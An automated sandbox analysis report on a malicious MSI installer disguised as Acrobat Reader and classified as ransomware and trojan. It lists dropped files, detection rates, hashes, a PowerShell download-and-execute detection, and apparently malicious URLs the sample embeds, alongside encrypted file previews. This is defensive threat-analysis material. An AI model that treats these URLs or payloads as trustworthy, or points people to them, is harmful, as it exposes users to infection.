C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\mrt100_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\mrt100_app.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\msvcp140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\msvcp140_app.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\vcamp140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vcamp140_app.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\vccorlib140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vccorlib140_app.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\vcomp140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vcomp140_app.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\vcruntime140_1_app.dll	42%	ReversingLabs	Win64.Trojan.SpywareX
C:\Users\user\AppData\Local\appData\vcruntime140_1_app.dll	5%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\vcruntime140_app.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\vcruntime140_app.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\appData\xmpp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\appData\xmpp.dll	1%	Virustotal		Browse
C:\Windows\Installer\MSIE0C6.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIE0C6.tmp	1%	Virustotal		Browse
C:\Windows\Installer\MSIE134.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIE134.tmp	1%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://crashpad.chromium.org/	0%	Avira URL Cloud	safe
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.brpY	0%	Avira URL Cloud	safe
http://nuget.org/NuGet.exe	0%	Avira URL Cloud	safe
https://webdocs75912232658.blob.core.windowsp	0%	Avira URL Cloud	safe
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.br	0%	Avira URL Cloud	safe
http://www.apachefriends.org/f/viewforum.php?f=4	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
https://crashpad.chromium.org/	0%	Virustotal		Browse
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.br	1%	Virustotal		Browse
http://nuget.org/NuGet.exe	0%	Virustotal		Browse
https://aka.ms/pscore6lB	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
https://crashpad.chromium.org/bug/new	0%	Avira URL Cloud	safe
http://www.apachefriends.org/f/viewforum.php?f=4	0%	Virustotal		Browse
https://aka.ms/pscore6lB	0%	Virustotal		Browse
http://pesterbdd.com/images/Pester.png	11%	Virustotal		Browse
https://contoso.com/	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://contoso.com/License	0%	Avira URL Cloud	safe
https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal	0%	Avira URL Cloud	safe
https://crashpad.chromium.org/bug/new	0%	Virustotal		Browse
https://contoso.com/Icon	0%	Avira URL Cloud	safe
https://contoso.com/	1%	Virustotal		Browse
https://nuget.org/nuget.exe	0%	Virustotal		Browse
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	0%	Avira URL Cloud	safe
https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal	2%	Virustotal		Browse
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	Virustotal		Browse
https://contoso.com/License	0%	Virustotal		Browse
http://www.apachefriends.org/f/viewforum.php?f=16	0%	Avira URL Cloud	safe
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://www.apachefriends.org/f/viewforum.php?f=16	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.brpY	WebExperienceHostApp.exe, 00000005.00000002.1865273677.000002594B215000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://crashpad.chromium.org/	WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://webdocs75912232658.blob.core.windowsp	powershell.exe, 00000003.00000002.1807784521.0000000004E84000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.br	WebExperienceHostApp.exe, WebExperienceHostApp.exe, 00000005.00000002.1864747200.0000000066677000.00000002.00000001.01000000.00000008.sdmp, WebExperienceHostApp.exe, 00000005.00000002.1865273677.000002594B27F000.00000004.00001000.00020000.00000000.sdmp, vcruntime140_1_app.dll.1.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apachefriends.org/f/viewforum.php?f=4	xmpp.dll.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.1807784521.0000000004851000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000003.00000002.1807784521.0000000004F72000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crashpad.chromium.org/bug/new	WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal	WebExperienceHostApp.exe, 00000005.00000002.1864747200.0000000066677000.00000002.00000001.01000000.00000008.sdmp, vcruntime140_1_app.dll.1.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.13.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1807784521.0000000004851000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apachefriends.org/f/viewforum.php?f=16	xmpp.dll.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1454459
Start date and time:	2024-06-10 11:00:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ust_019821730-0576383.msi
Detection:	MAL
Classification:	mal100.rans.troj.evad.winMSI@12/187@0/0
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.150.111.4, 20.189.173.22
Excluded domains from analysis (whitelisted): webdocs75912232658.blob.core.windows.net, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, blob.cpq22prdstr01a.store.core.windows.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target chrome.exe, PID 7916 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7644 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:01:07	API Interceptor	42x Sleep call for process: powershell.exe modified
05:03:02	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50	Br_i421i2-2481-125_754864.msi	Get hash	malicious	Unknown	Browse
	181_960.msi	Get hash	malicious	Unknown	Browse
	232_786.msi	Get hash	malicious	Unknown	Browse
	zHsIxYcmJV.msi	Get hash	malicious	Unknown	Browse
	18847_9.msi	Get hash	malicious	Unknown	Browse
C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Br_i421i2-2481-125_754864.msi	Get hash	malicious	Unknown	Browse
C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14	Br_i421i2-2481-125_754864.msi	Get hash	malicious	Unknown	Browse
	181_960.msi	Get hash	malicious	Unknown	Browse
	232_786.msi	Get hash	malicious	Unknown	Browse
	zHsIxYcmJV.msi	Get hash	malicious	Unknown	Browse
	18847_9.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\67df31.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	671494
Entropy (8bit):	6.594451242465726
Encrypted:	false
SSDEEP:	12288:DurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKgQ:SihNREtRdYndJP32R7vKG+47/L025zEk
MD5:	EE9E0C3BEAB8DE45A73B046BA2DCEBCE
SHA1:	13CDC86EA5D6FF71F577E305EF1B3FE48909B242
SHA-256:	9EFF67997E404A34CAB90E33105883242DD8256077A034745B4E150C3291BA7F
SHA-512:	70585CA83D56D4CA0CA195559DF33D46504D9F8523BC04B3515C2F27542783BBFEC81F0140FD9D079128AC25AA9D6432F54CB6FF79652262A214CCFD3CCCA3E8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Config.Msi\67df31.rbs, Author: Joe Security
Reputation:	low
Preview:	...@IXOS.@.....@#(.X.@.....@.....@.....@.....@.....@......&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}..Acrobat Reader..ust_019821730-0576383.msi.@.....@.....@.....@........&.{9533E8F2-DB9B-40B9-A160-5A93E74B5068}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{0D0E7F8C-B4C8-4986-A673-327EDC71EEC4}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{9F3423FF-5307-43F6-B561-838FF3F92B96}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{40C9E41B-7F86-4AB3-926F-20E11B86C94C}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{E332942A-8097-4399-A005-BAEAC5A78718}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{82A9F7A6-A2E1-4165-A1C3-371852835C60}&.{B95F3E55-F3A2-459E-ACB1-42A9918E3822}.@......&.{92D6C8E6-

C:\ProgramData\Chrome\Application\118.0.5993.120\124.0.6367.119.manifest

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.950479865350114
Encrypted:	false
SSDEEP:	6:KdhlRu9TbX+A8/5RFYpqaHkbdaHX0CdiYCMfrA1G:KLuVA5cpqnbd007v9G
MD5:	3D1A60355169072CAFDD73CFF131E17E
SHA1:	251C2DFB1CD400984DBC27C24BABE23EADB53CD2
SHA-256:	7A2C335DCB1154297442EA04FDA76C6EC8BC4436A4221E47A6C814B8A35E1FA3
SHA-512:	81D9E75F2766B3E9D15AB12313D06C42D79812C82FD587CD5A0ABB04F7C03AD549810A50F3410514A3E78D99247E5BDD5C0524541C5230672C5A9308318F078C
Malicious:	false
Reputation:	low
Preview:	<assembly.. xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>.. <assemblyIdentity.. name='124.0.6367.119'.. version='124.0.6367.119'.. type='win32'/>.. <file name='chrome_elf.dll'/>..</assembly>..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.1

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	103991
Entropy (8bit):	7.998327541415064
Encrypted:	true
SSDEEP:	1536:P5DGAhZ+Fj+rvsO8dPUKkCohq5eJomYJiXw10rFhoMKyTJYGEG+XnyR:PNGAba1DcKo0eJXASxaMnFN+XyR
MD5:	CAA89004DB99A2ADBB5AF8C708A83D24
SHA1:	0553BAE827AF709CA174A90C3380C998BF3E4971
SHA-256:	FE967E1B16FE2B3635A789DC39DA30BF25F4695F114BCFA9EDA630828F5823BB
SHA-512:	BD2BA2BDD969C61DC4C9BA4EF1716FCBC4F9356B12C5A69D3E4F1257C7BC4A12DFE11B8B385982B9A18011CD492F5B5C0D74CB6A30128958C8D938AD3384AD83
Malicious:	true
Reputation:	low
Preview:	..x..&.aN-Q...3ht.p8...:........+Pu.Nqt.Ip.%.f?.(2k\.)....H.I.Z...?.I......f>......,..h.....V...^.:._i.v..Vz...,.\|.m.q..t..?.D6..N7.U...=..J...1...n.....0.u1+@..+.x{..\|.I..~y&_.....l<L.}....Gj..........s....}o...../Y?..VV.Z.a.........~.4.......)....OA..lHm^F.^..".=.s._. S.n.w6.c./.n.h..N.D...0^.~....,}n..h.....rK.H.d:...D.JJ\|$...>....s...h.........zS.-]@I..}.Y]..8.P..`.G\Z.............O'gnW....1.p5...6.....#.E.....U.P.%)./.m.......i{.+...6.d3...+!.k:'..".@...&........Tl..yA..Z.q..#......D".."h..J.M.)B.._Z....G..z.:`.3...Ta...Q.q=N..H..D.V.....f..<c..f.(.[.#.;..v...?.Z/.j...w..+.....}nu..e.u....."kK_\.........\|.6.....?.q...h......uG.C..k.?Oi..8,<i..D..\|=...,.....(......@......H...v.........<..l../t.....6...&yT..r.u..`....}......a....ur.7.H5_.(...+X ..#.....0.(\_..S.....5.\b.....qu+5........S8c....O......Jq.....+q&17..C..#...i. tIe.......;.cfU.3V.....~...9.!..4{.3....cE...;....RK...I.j..c<A.WN~....C.H.aL.....vVLm......(.q!

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.10

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	97519
Entropy (8bit):	7.998059770467659
Encrypted:	true
SSDEEP:	1536:s41vCdu9NXtS/dA4KDeefltb6ZDTgYMlqnysqe4PbbhIbtmHl8E5VjIsYsa:sYvC4NdGKDeeffZqnyXe4zb6oHugtJYr
MD5:	5D6EE938181D82EE2D9CDE7F7B732E75
SHA1:	FA884FBE87503B86C5DA66AC73EC1381DC900F27
SHA-256:	F88FC25525E1180B73C9B37CAE20A9B4FF32987BF614FB3B1DA29DCC31BDFC10
SHA-512:	1AA228880A7F9915E08BBF9929DD5FB5F7E185351BD23FC49FD977A0102F21F6E99404264DAEB19AAE03D6FE41C4C11A496C3E3FF350388F61C1ABB47AA979AC
Malicious:	true
Preview:	.N:"vMS2.F.]...8O..6D..M...egv..'.@.._...Cu....kc]6)%I...]s.O...1K..5...b.......m.u...^.aPCD.......vSS.0hM..5...Uv!.....x.....:l.f.....d.Un...F...^.g.....2.[....V.b.......K..r...f..W.F......$..}........z.V.1.=..I.2+.6.............%...b.Tq..J.....:.....v..(&,.\|.gnv&.WH.)..[......F.....)?.0^....G.w...Z(...MZ.E......N.q.I...n..H...IE.sl..c..l..[...E.M%Z^.._N...F....)Pj...m....O..-.."..7f..=...oq.x.d..re...hlQ.C.\"...P=...~.g.!.o\|...p.F..C..Nks..\|C'#.~Ad.L.r.n.u..(....B.FB1..1.U2..1..hn../.D...E.?..u.........`l.J[.Pct].....ml.anJ...1v\|..[.......sq..4...Z!.$4WW...R..f....:w.[sK..bQ..jI.+.N.aO...a..z.N...L.5.~..E/c...L~...$.me..k...D..LU..>I!.9..r.~.......<......I$C. V(..#(]....]6...i........N.d..x......q.8r?.(.R.7.#.0G.....~X........;...;....ghr.)....t.vuye~.M.....,.[Q..V.P.G.K!.e.=..z..8AY.....!9[.............1...].b..V.G......w.7....;.X..l.H...YQ....PH%}.$..$..J+...IG...8............C..d...K..=....u.kL.(..k...U..#...e,....4i&.>...Az.gh..&...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.100

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	104708
Entropy (8bit):	7.998144550191305
Encrypted:	true
SSDEEP:	1536:kw6o34Q10auP010rl/MMZIHw+6tQP/7s3EgJ33eP6iuoH01FOn7acb0kvXbJ:D46d2rlUMZIHGWP/7s3tuP6iE7u0kvLJ
MD5:	5567BFFAE9E3519CEFEDF97092A374F8
SHA1:	C03147DC3CB25A2A0381CD4F934E4289347BE317
SHA-256:	DCE1C47108988E44E9EAC44437FCA9B6CA80BB833604B89759F3244A392CEC42
SHA-512:	0176DEA07103AB310355C8EBF5D3CAF25839EEBCB7DEC273405D3ABBA516679BEE0D0DE308F82E4C486A2E76DDBF65176A57B0C6E8F6DEB6491BE3BFB85AC14B
Malicious:	true
Preview:	6U#....9..Y...w....g}..f....,..$..F...!..x..b..j.L...A....E.a&..N...7..bJ...l.l......`=.....!.`...9.)#.[.g...@....0.D\|o.Q\|)._y..C..l..B....i....?..M:..0....1..m8Y.h.....'..........h.v+.b~s.Dg.MM,..I......3...4...L3...1\|.....u.!..P..~k..hh1....6.>X.R.b..@9.....)4C.....T.....b.....M..D+......a.G...S]Cbt.6.G..'..1......~..x.\.n....E.E...na%.V....n.....B.u.h..H..;z.3.#..4..W.....3\|dr..U.z.9.&.o.....B..#X...^...._.&K..H...}y...._...`..!!.ne.bI&..x.....y..m...^..Y.3..2ul.......AN..K...v..o....X...w5".21,1..uw...9.V..< 9... -..=.c....;..GQ....w.$r..$...Y.ZK0..S..."._.'...\V...;N....M......x..8.1D+.4..t.c._..5sX......mR.g.$0.w..G.....]..o..xD..vp,..qg..'....In..n...0DB....7.h...,......@.....;.7<...[vO"B.5A3..H.Qo.d..&.s...S.v....jJ.#Sa.S5.K....LT^t..^Cc".cX.?%.*..^.....aP...eG.....yf..bb......WvJ.{...S6D...R..X._....Q..0cja...._......(k.6Fa>_>.t.-H.S..._....<.?.#..O..D.H6.98.....s..T........7..j.../..g....B,'..VE.7.l..b%.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.101

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	87789
Entropy (8bit):	7.99805920411028
Encrypted:	true
SSDEEP:	1536:anji+x+n09Z1mNOTg80ELTAqomeO8Y5XVaN1koUXWE/HS6u8/VvhI3jAWf+0mIzw:aji+LyuTAq7eNN1k9bSZyvhITJm09M0i
MD5:	944AB53D06E45EB2E1E8C2B2C6B00CFE
SHA1:	510B7982AE21DD5C4CDB79EDA4EC1EC54C26EAB6
SHA-256:	5C6FD879514A3C0C97F5C6F384482EE4D3150C3BED402609919CD8D8732ECA21
SHA-512:	AB0AE37163C334A6A83E1F41467DC5F21C067C33ACFDD0E864BCC6020D83BE5C00BDA38D1C6799FEDFE6C80F717930FB19049BE5F9BFFE34D3D91BDC4BCD423D
Malicious:	true
Preview:	...oy...L.0 .....f...[.8a.qT.6nG....Z....J.[k...H.7@Jht.Ds..i.....P.iU...].]..Z.?...bi#.~=.I...~.&.aSY...>.9z....ir-VgUW0[V..<:.E...(g.9<).B.5...+i........5]k......&...T.5.OD."..c.=.j_$......[:...]....:O...;....m......a..<.\|>.[.Yk......Zz.@.[D.I>...?.._v:.......k.a....+..O"..o.0....j......k...<3......l.S?......<......j{bPD..o..W.y....4n,J87....<....,.;.\|.c.@.\|....!.f....CT...9}k.P.jf..;$....X.,$q\|8.a...r.i.-...FQU.#{.1.,a....SwU.@.O..a....<...=cz.A.....~..d.0O.x.....yQ/...q...M.Q. ..ee...!..a{l..[.)....-K.-+.J.C.6...Q...a6.9M...N/1..tA..O..1.$..ZqB....A....N...J....s..`..<..VT;w)K}r...f..}......;S.Zf`...gK.r#S?.>..X..S...\...[s:...o..(...V.>f'f.:l.,e&U?..m.3d.....jT\|.j...T..S.(.ZI..16.c(.........(.)I".~.........;.._..#....T:..$.'j....4...`-....5....i.'.%...,..4.*..t..:.\.c.1....a....#..<..K.......w&.f.....D.yA..Y."3.f@4.Z.8OK4....5...X..1!Z..xD.D.v!h...{H.o..J...4....]...i.?..?......C.......x.....)g.p4X<..&S`...f\|.G.....\..~..:

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.102

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32184
Entropy (8bit):	7.993984375372734
Encrypted:	true
SSDEEP:	768:FTuiWqjj/ndxrW8vBLtxMC32sFqz6LtYhATViwRP:Z5N/nvS8v/xMCDFostfV3P
MD5:	0DBF722D1FA4C22E4B10C69CF9AA7813
SHA1:	DEA4661D11603DB0F5FA7605E937B2065C1E60C0
SHA-256:	F5AF4E2B5911EA08B406E3EA44BA099B1A1E035C963C4260ACADA6D8A6AC8F81
SHA-512:	B5FB16D56716B2D228093AD7FAE80C85748236EF413078815D4615EFF1E249B217CFCC5728690EBF2967F98373EF652053230579D31D2FE422BE5B49F327C798
Malicious:	true
Preview:	T.}..-oOR....f.N.F....B..5...'..I.R.c....B._\|Pb}>..w:.w..w.;.......&..@....)..8# .b....#L. ';6..m._."/}..p.....mRsZ.;1.x$U.:........o%HXC......9....H.r..S.kXf!u~.{/.."pKV).8...2.FC%.r...........W."qA....I....h.o......./..j.~.Jw7K`..5S\By..N...eW+.'j...".?.)P.`.[.....m..Q....55J!.h\|3\........E.]..p.M.....[..r..i.`......d.I...:.....>Mn.Df'...Q.D..%.'..@m.x.^.x.....6.r...Fkh\|.v...a.......Y.?I.MI..;`m]Ucl.........Z.N...O.>A9...4F....W..?.?...6.=.@#z.;7..a.}.T .8...(v".r..].[".W.W\|.u..../...e......d.U&.$2.9.O..c.\P...3......Y.......h.......=...x....H#.a.)....y..>.\|,FB..Ap.$/d+.....`j2.1t......{.....^.&..@.L%..k9..9.e......q.^R...x.k..<.0....1....;Rr.Y.+MpI.....`.q.=.<.-.P..m2..n6.......WMF3...G.}:...xHZ.....-.{.Is...n.7A.......X....m.$;.....kI.rm0....q.;.6.Z..{..k_.c....MK..J..1.G..:..I.p..mZ...j....8..t]........5{..J.ME..=....E+..S.+.`,F.....)..'W.."#iT>..CcZ.[.~..C:..v7..x.........lI.jS....C......... ..e.(..4.:.8@ha...S....tA.8..A.D.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.103

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	57860
Entropy (8bit):	7.996961383097085
Encrypted:	true
SSDEEP:	1536:4onB7ezCgX0whRqKNY2Hv1R4eETDPlLLVI/FFVUmmCM:/BizCgEwhRqzNtLLVwbFrM
MD5:	5E494E15A0AA584319E0FCA3204F2E67
SHA1:	D4A8E02A765EE181E5980950223A7A3ADA8B7017
SHA-256:	17A6F1C5E2B5D1681188F42641AE8C55E520D1E9710995462D0B0A52289D4D74
SHA-512:	B9D7C9AF05F3C94C954A011B1CCB8709CAA218A271CAA56D025CB5369DDCB6403B33330BB9D2B79973110E6AFAFD27469B5DBA36ED18F4701344598FF0D9AC60
Malicious:	true
Preview:	.).d.S....;..D...S..@. .....&>RH.$.u.]2.4.5..]..........R\L..i.Q.F..I..(....p........ .oiu..Y7..rwg.Z....SS.a.=#.e.@.7R..l,.8..6.9.......C.iRu...Z.\|...r,3l............j.L\Cn..........t.V5{.wW.K..Z._}\..8I..7....Ku......../.`...-wH...o{:..H@.....`.+S3..6..jH...Ik.!..N2.._..\...9...m\|..^..5.:R.5....^.......rI..m..K.<%..\..<;Wj...R.C.Od.[b...S5...f.$...f\<...7p..1g."...B.3..w.:.....-C...q..r..G5".I.S...EH.W..._F.ZC.~.......v..~A\|NWxx\l....\|..; h>.41X.f...-y..;e....A[.].w^].....oy0....\|..=."..S.'Jj..........7T}....N._....-....j.]....z.w.......b;a.+R..P...].p;..K$....a.g_r..4.[r..`.2j.\|........&3..e.k.j.B.......?+..7T.Q......7..ye<..9..$;.h....]........oT.e?.A.."{......l.]..Z...xt..W\|.B.....f,}P..&...)z.,eb..Q..J....1...fa...0........3iL.kA...w.........:..h.H.dKF.2.o........:uv../.,............,p.#k..X........er.j4.7.....mY.{...x2.\5].:K..A=..d0..4..(7.......gx).f...-.x.w,M.H."!.Q..c.u..NIV&O....(.W.B./.....Np.........W,A3.x....@...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.104

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98056
Entropy (8bit):	7.998371655290425
Encrypted:	true
SSDEEP:	1536:7Z6vVvq0fFRvHymqh2GB0pqeCAz2GRkOgfKZ/sNZAJMKSSNlC1kW5iqKWNV2EuAT:8vtqqFRjqQGB4qz/kk/KZ66SMKkq/nhp
MD5:	976772315D7C186F84C04FCEAE791102
SHA1:	EA82D9DCF5A3C349C04B2B6339F68359369434E6
SHA-256:	DE8F33830B565C5E3CB7ABB7F18C03500445435571CC3C1C225762005247E111
SHA-512:	737320BCC7815FBC08F68C21403ED12C471A2F1042DC298FD0F3FBE2F7A691EC84CA8AD398321007FFABA485623B9BA1D0C21AC212E7EC1D9C5D421DF3680330
Malicious:	true
